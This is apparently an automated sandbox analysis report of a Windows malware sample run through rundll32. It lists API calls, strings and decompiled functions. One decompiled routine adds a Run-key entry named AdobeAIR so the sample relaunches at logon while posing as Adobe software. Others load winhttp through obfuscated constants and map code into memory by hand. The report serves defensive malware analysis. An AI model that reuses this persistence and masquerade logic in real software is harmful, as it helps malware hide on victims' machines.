Part of subcall function 63C07EC0: wcslen.MSVCRT ref: 63C081D7
Part of subcall function 63C07EC0: GetProcessHeap.KERNEL32 ref: 63C081F0
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C08221
Part of subcall function 63C07EC0: wcsrchr.MSVCRT ref: 63C08234
Part of subcall function 63C07EC0: wcscat.MSVCRT ref: 63C08265
Part of subcall function 63C07EC0: wcscat.MSVCRT ref: 63C08274
Part of subcall function 63C07EC0: FindResourceA.KERNEL32 ref: 63C08338
Part of subcall function 63C07EC0: CreateActCtxA.KERNEL32 ref: 63C08354
Part of subcall function 63C07EC0: ActivateActCtx.KERNEL32 ref: 63C0836D
Part of subcall function 63C07EC0: LoadLibraryA.KERNEL32 ref: 63C083B6
Part of subcall function 63C07EC0: GetProcAddress.KERNEL32 ref: 63C0840C
Part of subcall function 63C07EC0: VirtualFree.KERNEL32 ref: 63C08450
Part of subcall function 63C07EC0: FindResourceA.KERNEL32 ref: 63C0846D
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C084A1
Part of subcall function 63C07EC0: VirtualAlloc.KERNEL32 ref: 63C08502
Part of subcall function 63C07EC0: GetProcessHeap.KERNEL32 ref: 63C085BE
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C085D7
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C0866E
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C086B2

memcmp.MSVCRT ref: 63C07696
free.MSVCRT ref: 63C076CF
malloc.MSVCRT ref: 63C07714
free.MSVCRT ref: 63C07A85

Part of subcall function 63C06D50: memcpy.MSVCRT ref: 63C06DA3

Part of subcall function 63C069E0: malloc.MSVCRT ref: 63C069F8

Part of subcall function 63C06AF0: memcpy.MSVCRT ref: 63C06B0E

free.MSVCRT ref: 63C077D5
WaitForMultipleObjects.KERNEL32 ref: 63C07D18

Part of subcall function 63C07070: malloc.MSVCRT ref: 63C070BB
Part of subcall function 63C07070: memset.MSVCRT ref: 63C070D1
Part of subcall function 63C07070: memcpy.MSVCRT ref: 63C070E3
Part of subcall function 63C07070: free.MSVCRT ref: 63C070F9
Part of subcall function 63C07070: malloc.MSVCRT ref: 63C07117
Part of subcall function 63C07070: malloc.MSVCRT ref: 63C0714A

Part of subcall function 63C06A50: memset.MSVCRT ref: 63C06A6F
Part of subcall function 63C06A50: free.MSVCRT(?,?,?,00022620,63C07CE7), ref: 63C06A79

CreateThread.KERNEL32 ref: 63C07980
ResumeThread.KERNELBASE ref: 63C079BA
Sleep.KERNELBASE ref: 63C079CA
WaitForMultipleObjects.KERNEL32 ref: 63C079EE
CloseHandle.KERNEL32 ref: 63C07A0A

Part of subcall function 63C06FD0: free.MSVCRT ref: 63C06FF9
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07006
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07014
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07027
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07036
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07044

VirtualFree.KERNEL32 ref: 63C07A47

Part of subcall function 63C072F0: FreeLibrary.KERNEL32(?,?,-00000001,-00000001,63C07A55), ref: 63C07316

VirtualFree.KERNEL32 ref: 63C07A79
VirtualAlloc.KERNELBASE ref: 63C07ABF
memcpy.MSVCRT ref: 63C07B01
VirtualFree.KERNEL32 ref: 63C07B67
ExitProcess.KERNEL32 ref: 63C07D2D

Strings

n, xrefs: 63C076F6
), xrefs: 63C0770A
, xrefs: 63C0784C
(, xrefs: 63C07700
[, xrefs: 63C076FB

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 5ADE1E0C, Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 64

APIs

AssocQueryStringW.SHLWAPI(00000010,00000004,http,00000000,?,00000400), ref: 5ADE1E33
lstrcmpiW.KERNEL32(?,Internet Explorer), ref: 5ADE1E53
lstrcmpiW.KERNEL32(?,Firefox), ref: 5ADE1E6F
lstrcmpiW.KERNEL32(?,Google Chrome), ref: 5ADE1E8B
lstrcmpiW.KERNEL32(?,Safari), ref: 5ADE1EA7
lstrcmpiW.KERNEL32(?,Opera Internet Browser), ref: 5ADE1EC3

Strings

Google Chrome, xrefs: 5ADE1E85
Opera Internet Browser, xrefs: 5ADE1EBD
Firefox, xrefs: 5ADE1E69
http, xrefs: 5ADE1E2A
Internet Explorer, xrefs: 5ADE1E4D
Safari, xrefs: 5ADE1EA1

Memory Dump Source

Source File: 00000004.00000002.1579340613.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000004.00000002.1579333111.5ADE0000.00000002.sdmp
Associated: 00000004.00000002.1579348779.5ADE3000.00000004.sdmp
Associated: 00000004.00000002.1579356119.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5ade0000_rundll32.jbxd

Function 5ADE240D, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 65

C-Code - Quality: 100%

			E5ADE240D() {
				int _v8;
				char _v1032;
				void* _v1036;
				char _v3084;
				long _t17;
				long _t18;
				long _t22;
				int _t28;
				void* _t30;

				GetModuleFileNameA( *0x5ade256c,  &_v3084, 0x400);
				_t17 = RegOpenKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x2001b,  &_v1036); // executed
				_t18 = _t17;
				if(_t18 == 0) {
					wsprintfA( &_v1032, "rundll32 \"%s\", #2",  &_v3084);
					_t22 = RegQueryValueExA(_v1036,  &(("\\AdobeAIR")[1]), 0, 0,  &_v3084,  &_v8); // executed
					if(_t22 != 0) {
						L3:
						RegSetValueExA(_v1036,  &(("\\AdobeAIR")[1]), 0, 1,  &_v1032, lstrlenA( &_v1032));
						_t28 = 0xffffffffffffffff;
						L4:
						RegCloseKey(_v1036);
						_t30 = _t28;
						return _t30;
					}
					_t28 = lstrcmpiA( &_v3084,  &_v1032);
					if(_t28 == 0) {
						goto L4;
					}
					goto L3;
				}
				return _t18;
			}

APIs

GetModuleFileNameA.KERNEL32(?,00000400), ref: 5ADE2428
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,0002001B,?), ref: 5ADE2446
wsprintfA.USER32 ref: 5ADE2467
RegQueryValueExA.KERNEL32(?,#3,00000000,00000000,?,?), ref: 5ADE248C
lstrcmpiA.KERNEL32(?,?), ref: 5ADE24A4
lstrlenA.KERNEL32(?), ref: 5ADE24B5
RegSetValueExA.ADVAPI32(?,#3,00000000,00000001,?,00000000), ref: 5ADE24D4
RegCloseKey.ADVAPI32(?,-00000001), ref: 5ADE24E4

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 5ADE243C
cHHw, xrefs: 5ADE248C
rundll32 "%s", #2, xrefs: 5ADE2461

Memory Dump Source

Source File: 00000004.00000002.1579340613.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000004.00000002.1579333111.5ADE0000.00000002.sdmp
Associated: 00000004.00000002.1579348779.5ADE3000.00000004.sdmp
Associated: 00000004.00000002.1579356119.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5ade0000_rundll32.jbxd

Function 63C07A97, Relevance: 13.7, APIs: 9, Instructions: 172

APIs

Part of subcall function 63C07070: malloc.MSVCRT ref: 63C070BB
Part of subcall function 63C07070: memset.MSVCRT ref: 63C070D1
Part of subcall function 63C07070: memcpy.MSVCRT ref: 63C070E3
Part of subcall function 63C07070: free.MSVCRT ref: 63C070F9
Part of subcall function 63C07070: malloc.MSVCRT ref: 63C07117
Part of subcall function 63C07070: malloc.MSVCRT ref: 63C0714A

Part of subcall function 63C06A50: memset.MSVCRT ref: 63C06A6F
Part of subcall function 63C06A50: free.MSVCRT(?,?,?,00022620,63C07CE7), ref: 63C06A79

Part of subcall function 63C06D50: memcpy.MSVCRT ref: 63C06DA3

Part of subcall function 63C069E0: malloc.MSVCRT ref: 63C069F8

Part of subcall function 63C06AF0: memcpy.MSVCRT ref: 63C06B0E

CreateThread.KERNEL32 ref: 63C07980
ResumeThread.KERNELBASE ref: 63C079BA
Sleep.KERNELBASE ref: 63C079CA
WaitForMultipleObjects.KERNEL32 ref: 63C079EE
CloseHandle.KERNEL32 ref: 63C07A0A

Part of subcall function 63C06FD0: free.MSVCRT ref: 63C06FF9
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07006
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07014
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07027
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07036
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07044

VirtualFree.KERNEL32 ref: 63C07A47

Part of subcall function 63C072F0: FreeLibrary.KERNEL32(?,?,-00000001,-00000001,63C07A55), ref: 63C07316

VirtualFree.KERNEL32 ref: 63C07A79
free.MSVCRT ref: 63C07A85
VirtualAlloc.KERNELBASE ref: 63C07ABF
memcpy.MSVCRT ref: 63C07B01

Part of subcall function 63C07EC0: VirtualAlloc.KERNEL32 ref: 63C07F6D
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C07F90
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C07FDE
Part of subcall function 63C07EC0: GetProcessHeap.KERNEL32 ref: 63C08094
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C080B7
Part of subcall function 63C07EC0: GetVersionExA.KERNEL32 ref: 63C0813D
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C08186
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C081A4
Part of subcall function 63C07EC0: wcslen.MSVCRT ref: 63C081C0
Part of subcall function 63C07EC0: wcslen.MSVCRT ref: 63C081D7
Part of subcall function 63C07EC0: GetProcessHeap.KERNEL32 ref: 63C081F0
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C08221
Part of subcall function 63C07EC0: wcsrchr.MSVCRT ref: 63C08234
Part of subcall function 63C07EC0: wcscat.MSVCRT ref: 63C08265
Part of subcall function 63C07EC0: wcscat.MSVCRT ref: 63C08274
Part of subcall function 63C07EC0: FindResourceA.KERNEL32 ref: 63C08338
Part of subcall function 63C07EC0: CreateActCtxA.KERNEL32 ref: 63C08354
Part of subcall function 63C07EC0: ActivateActCtx.KERNEL32 ref: 63C0836D
Part of subcall function 63C07EC0: LoadLibraryA.KERNEL32 ref: 63C083B6
Part of subcall function 63C07EC0: GetProcAddress.KERNEL32 ref: 63C0840C
Part of subcall function 63C07EC0: VirtualFree.KERNEL32 ref: 63C08450
Part of subcall function 63C07EC0: FindResourceA.KERNEL32 ref: 63C0846D
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C084A1
Part of subcall function 63C07EC0: VirtualAlloc.KERNEL32 ref: 63C08502
Part of subcall function 63C07EC0: GetProcessHeap.KERNEL32 ref: 63C085BE
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C085D7
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C0866E
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C086B2

VirtualFree.KERNEL32 ref: 63C07B67
WaitForMultipleObjects.KERNEL32 ref: 63C07D18
ExitProcess.KERNEL32 ref: 63C07D2D

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 002352C0, Relevance: 12.1, APIs: 8, Instructions: 76

APIs

LoadLibraryW.KERNEL32 ref: 002352DB
GetProcAddress.KERNEL32(?,?,?,?,?,00000000,00239E77), ref: 00235302
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,00239E77), ref: 0023531C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00239E77), ref: 00235336
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00239E77), ref: 00235350
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00239E77), ref: 0023536A
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00235384
FreeLibrary.KERNEL32 ref: 002353DB

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C07C09, Relevance: 10.7, APIs: 7, Instructions: 167

APIs

Part of subcall function 63C07070: malloc.MSVCRT ref: 63C070BB
Part of subcall function 63C07070: memset.MSVCRT ref: 63C070D1
Part of subcall function 63C07070: memcpy.MSVCRT ref: 63C070E3
Part of subcall function 63C07070: free.MSVCRT ref: 63C070F9
Part of subcall function 63C07070: malloc.MSVCRT ref: 63C07117
Part of subcall function 63C07070: malloc.MSVCRT ref: 63C0714A

VirtualFree.KERNEL32 ref: 63C07B67

Part of subcall function 63C06A50: memset.MSVCRT ref: 63C06A6F
Part of subcall function 63C06A50: free.MSVCRT(?,?,?,00022620,63C07CE7), ref: 63C06A79

Part of subcall function 63C06D50: memcpy.MSVCRT ref: 63C06DA3

Part of subcall function 63C069E0: malloc.MSVCRT ref: 63C069F8

Part of subcall function 63C06AF0: memcpy.MSVCRT ref: 63C06B0E

CreateThread.KERNEL32 ref: 63C07980
ResumeThread.KERNELBASE ref: 63C079BA
Sleep.KERNELBASE ref: 63C079CA
WaitForMultipleObjects.KERNEL32 ref: 63C079EE
CloseHandle.KERNEL32 ref: 63C07A0A

Part of subcall function 63C06FD0: free.MSVCRT ref: 63C06FF9
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07006
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07014
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07027
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07036
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07044

VirtualFree.KERNEL32 ref: 63C07A47

Part of subcall function 63C072F0: FreeLibrary.KERNEL32(?,?,-00000001,-00000001,63C07A55), ref: 63C07316

VirtualFree.KERNEL32 ref: 63C07A79
free.MSVCRT ref: 63C07A85
VirtualAlloc.KERNELBASE ref: 63C07ABF
memcpy.MSVCRT ref: 63C07B01

Part of subcall function 63C07EC0: VirtualAlloc.KERNEL32 ref: 63C07F6D
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C07F90
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C07FDE
Part of subcall function 63C07EC0: GetProcessHeap.KERNEL32 ref: 63C08094
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C080B7
Part of subcall function 63C07EC0: GetVersionExA.KERNEL32 ref: 63C0813D
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C08186
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C081A4
Part of subcall function 63C07EC0: wcslen.MSVCRT ref: 63C081C0
Part of subcall function 63C07EC0: wcslen.MSVCRT ref: 63C081D7
Part of subcall function 63C07EC0: GetProcessHeap.KERNEL32 ref: 63C081F0
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C08221
Part of subcall function 63C07EC0: wcsrchr.MSVCRT ref: 63C08234
Part of subcall function 63C07EC0: wcscat.MSVCRT ref: 63C08265
Part of subcall function 63C07EC0: wcscat.MSVCRT ref: 63C08274
Part of subcall function 63C07EC0: FindResourceA.KERNEL32 ref: 63C08338
Part of subcall function 63C07EC0: CreateActCtxA.KERNEL32 ref: 63C08354
Part of subcall function 63C07EC0: ActivateActCtx.KERNEL32 ref: 63C0836D
Part of subcall function 63C07EC0: LoadLibraryA.KERNEL32 ref: 63C083B6
Part of subcall function 63C07EC0: GetProcAddress.KERNEL32 ref: 63C0840C
Part of subcall function 63C07EC0: VirtualFree.KERNEL32 ref: 63C08450
Part of subcall function 63C07EC0: FindResourceA.KERNEL32 ref: 63C0846D
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C084A1
Part of subcall function 63C07EC0: VirtualAlloc.KERNEL32 ref: 63C08502
Part of subcall function 63C07EC0: GetProcessHeap.KERNEL32 ref: 63C085BE
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C085D7
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C0866E
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C086B2

WaitForMultipleObjects.KERNEL32 ref: 63C07D18
ExitProcess.KERNEL32 ref: 63C07D2D

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 002352CC, Relevance: 10.6, APIs: 7, Instructions: 66

APIs

LoadLibraryW.KERNEL32 ref: 002352DB
GetProcAddress.KERNEL32(?,?,?,?,?,00000000,00239E77), ref: 00235302
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,00239E77), ref: 0023531C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00239E77), ref: 00235336
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00239E77), ref: 00235350
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00239E77), ref: 0023536A
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00235384
FreeLibrary.KERNEL32 ref: 002353DB

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022DF40, Relevance: 9.1, APIs: 6, Instructions: 93

APIs

WinHttpReceiveResponse.WINHTTP ref: 0022DF6D
WinHttpQueryDataAvailable.WINHTTP ref: 0022DF92
GetLastError.KERNEL32 ref: 0022DFA5
free.MSVCRT ref: 0022DFEA
realloc.MSVCRT ref: 0022E007
WinHttpReadData.WINHTTP ref: 0022E030

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00231A10, Relevance: 9.1, APIs: 6, Instructions: 63

APIs

RegOpenKeyExW.KERNEL32 ref: 00231A4B
RegQueryValueExW.ADVAPI32 ref: 00231A89
RegCloseKey.ADVAPI32 ref: 00231A9B
calloc.MSVCRT ref: 00231ABD
RegQueryValueExW.ADVAPI32 ref: 00231AEF
free.MSVCRT ref: 00231AFB

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C07330, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94

APIs

VirtualProtect.KERNELBASE ref: 63C073DE
memset.MSVCRT ref: 63C0742A

Strings

\, xrefs: 63C07341
%-=wOm>w, xrefs: 63C073D9
@, xrefs: 63C073C3

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 5ADE233A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54

C-Code - Quality: 100%

			E5ADE233A(void* __edx) {
				void* _v11;
				void* _v12;
				void* _v13;
				void* _v15;
				void* _v19;
				void* _v23;
				void* _v24;
				void* _v28;
				void* _v32;
				intOrPtr _v36;
				intOrPtr _v119;

				_v119 = _v119 + __edx;
				_v36 = 0x61766461;
			}

0x5ade233a
0x5ade2341

APIs

LoadLibraryA.KERNEL32(advapi32.dll), ref: 5ADE2384
LoadLibraryA.KERNEL32(winhttp.dl), ref: 5ADE23B4

Part of subcall function 5ADE23D5: GetProcAddress.KERNEL32(00000000,00000000,5ADE23A3), ref: 5ADE23DC

Strings

advapi32.dll, xrefs: 5ADE2380, 5ADE2383
l, xrefs: 5ADE236E
winhttp.dl, xrefs: 5ADE23B0, 5ADE23B3

Memory Dump Source

Source File: 00000004.00000002.1579340613.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000004.00000002.1579333111.5ADE0000.00000002.sdmp
Associated: 00000004.00000002.1579348779.5ADE3000.00000004.sdmp
Associated: 00000004.00000002.1579356119.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5ade0000_rundll32.jbxd

Function 5ADE233B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46

C-Code - Quality: 100%

			E5ADE233B() {
				void* _v11;
				void* _v12;
				void* _v13;
				void* _v15;
				void* _v19;
				void* _v23;
				void* _v24;
				void* _v28;
				void* _v32;
				intOrPtr _v36;

				_v36 = 0x61766461;
			}

0x5ade2341

APIs

LoadLibraryA.KERNEL32(advapi32.dll), ref: 5ADE2384

Part of subcall function 5ADE23D5: GetProcAddress.KERNEL32(00000000,00000000,5ADE23A3), ref: 5ADE23DC

LoadLibraryA.KERNEL32(winhttp.dl), ref: 5ADE23B4

Strings

advapi32.dll, xrefs: 5ADE2380, 5ADE2383
l, xrefs: 5ADE236E
winhttp.dl, xrefs: 5ADE23B0, 5ADE23B3

Memory Dump Source

Source File: 00000004.00000002.1579340613.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000004.00000002.1579333111.5ADE0000.00000002.sdmp
Associated: 00000004.00000002.1579348779.5ADE3000.00000004.sdmp
Associated: 00000004.00000002.1579356119.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5ade0000_rundll32.jbxd

Function 5ADE2331, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43

C-Code - Quality: 83%

			E5ADE2331(intOrPtr* __eax, void* __edx, void* __eflags) {
				intOrPtr _v7;
				char _v8;
				char _v9;
				short _v11;
				intOrPtr _v15;
				char _v19;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v119;
				void* __ebx;
				struct HINSTANCE__* _t22;
				struct HINSTANCE__* _t27;
				void* _t43;
				void* _t44;
				void* _t46;

				_t46 = _t43;
				_pop(_t44);
				asm("insb");
				if(__eflags <= 0) {
					_v19 = 0x686e6977;
					_v15 = 0x2e707474;
					_v11 = 0x6c64;
					_v9 = 0x6c;
					_v8 = 0;
					_v7 = 0;
					_t13 =  &_v32; // 0x61766461
					_t22 = LoadLibraryA(_t13);
					_t23 = _t22;
					if(_t22 != 0) {
						_v7 = 1;
						E5ADE23D5(_t23, _t23);
						if(_v7 != 0) {
							_v7 = 0;
							_t17 =  &_v19; // 0x686e6977
							_t27 = LoadLibraryA(_t17); // executed
							_t28 = _t27;
							if(_t27 != 0) {
								_v7 = 1;
								E5ADE23D5(_t28, _t28);
							}
						}
					}
				} else {
					asm("retf 0x6c");
					 *__eax =  *__eax + __eax;
					_v119 = _v119 + __edx;
					_push(_t44);
					_t44 = _t46;
					_v32 = 0x61766461;
				}
				return _v7;
			}

APIs

LoadLibraryA.KERNEL32(advapi32.dll), ref: 5ADE2384

Part of subcall function 5ADE23D5: GetProcAddress.KERNEL32(00000000,00000000,5ADE23A3), ref: 5ADE23DC

LoadLibraryA.KERNEL32(winhttp.dl), ref: 5ADE23B4

Strings

advapi32.dll, xrefs: 5ADE2380, 5ADE2383
l, xrefs: 5ADE236E
winhttp.dl, xrefs: 5ADE23B0, 5ADE23B3

Memory Dump Source

Source File: 00000004.00000002.1579340613.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000004.00000002.1579333111.5ADE0000.00000002.sdmp
Associated: 00000004.00000002.1579348779.5ADE3000.00000004.sdmp
Associated: 00000004.00000002.1579356119.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5ade0000_rundll32.jbxd

Function 002212F9, Relevance: 7.6, APIs: 5, Instructions: 76

APIs

Part of subcall function 00235D00: VirtualQuery.KERNEL32 ref: 00235E97
Part of subcall function 00235D00: VirtualProtect.KERNEL32 ref: 00235EC8
Part of subcall function 00235D00: signal.MSVCRT ref: 0023600A
Part of subcall function 00235D00: signal.MSVCRT ref: 0023606F
Part of subcall function 00235D00: signal.MSVCRT ref: 002360AF
Part of subcall function 00235D00: signal.MSVCRT ref: 002360C8
Part of subcall function 00235D00: signal.MSVCRT ref: 002360EE
Part of subcall function 00235D00: signal.MSVCRT ref: 0023611F
Part of subcall function 00235D00: signal.MSVCRT ref: 0023613F
Part of subcall function 00235D00: signal.MSVCRT ref: 0023615F

Sleep.KERNEL32 ref: 00221211
SetUnhandledExceptionFilter.KERNEL32 ref: 00221292
malloc.MSVCRT ref: 0022134A
strlen.MSVCRT ref: 0022136A
malloc.MSVCRT ref: 00221375
memcpy.MSVCRT ref: 00221391

Part of subcall function 00239E10: GetTickCount.KERNEL32 ref: 00239E35
Part of subcall function 00239E10: GdiplusStartup.GDIPLUS ref: 00239E98
Part of subcall function 00239E10: Sleep.KERNELBASE ref: 00239EE7
Part of subcall function 00239E10: GetTickCount.KERNEL32 ref: 00239EF0
Part of subcall function 00239E10: GetTickCount.KERNEL32 ref: 00239F69
Part of subcall function 00239E10: GetTickCount.KERNEL32 ref: 00239F71
Part of subcall function 00239E10: GetTickCount.KERNEL32 ref: 00239F85
Part of subcall function 00239E10: GetTickCount.KERNEL32 ref: 00239FA7
Part of subcall function 00239E10: Sleep.KERNEL32 ref: 00239FDF
Part of subcall function 00239E10: Sleep.KERNEL32 ref: 0023A01D
Part of subcall function 00239E10: GetTickCount.KERNEL32 ref: 0023A033
Part of subcall function 00239E10: Sleep.KERNEL32 ref: 0023A04F
Part of subcall function 00239E10: Sleep.KERNEL32 ref: 0023A069
Part of subcall function 00239E10: GetTickCount.KERNEL32 ref: 0023A074
Part of subcall function 00239E10: calloc.MSVCRT ref: 0023A0FF
Part of subcall function 00239E10: MultiByteToWideChar.KERNEL32 ref: 0023A12C
Part of subcall function 00239E10: free.MSVCRT ref: 0023A169
Part of subcall function 00239E10: free.MSVCRT ref: 0023A177
Part of subcall function 00239E10: free.MSVCRT ref: 0023A21A
Part of subcall function 00239E10: free.MSVCRT ref: 0023A225
Part of subcall function 00239E10: lstrlenW.KERNEL32 ref: 0023A24D
Part of subcall function 00239E10: lstrlenW.KERNEL32 ref: 0023A290

_cexit.MSVCRT ref: 002213FF
_amsg_exit.MSVCRT ref: 0022142B
_initterm.MSVCRT ref: 0022144D
GetStartupInfoA.KERNEL32 ref: 00221473
_initterm.MSVCRT ref: 0022149A
exit.MSVCRT ref: 002214AE

Part of subcall function 00235740: GetSystemTimeAsFileTime.KERNEL32 ref: 00235779
Part of subcall function 00235740: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,002214F2), ref: 0023578A
Part of subcall function 00235740: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,002214F2), ref: 00235792
Part of subcall function 00235740: GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,002214F2), ref: 0023579A
Part of subcall function 00235740: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,002214F2), ref: 002357A9

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
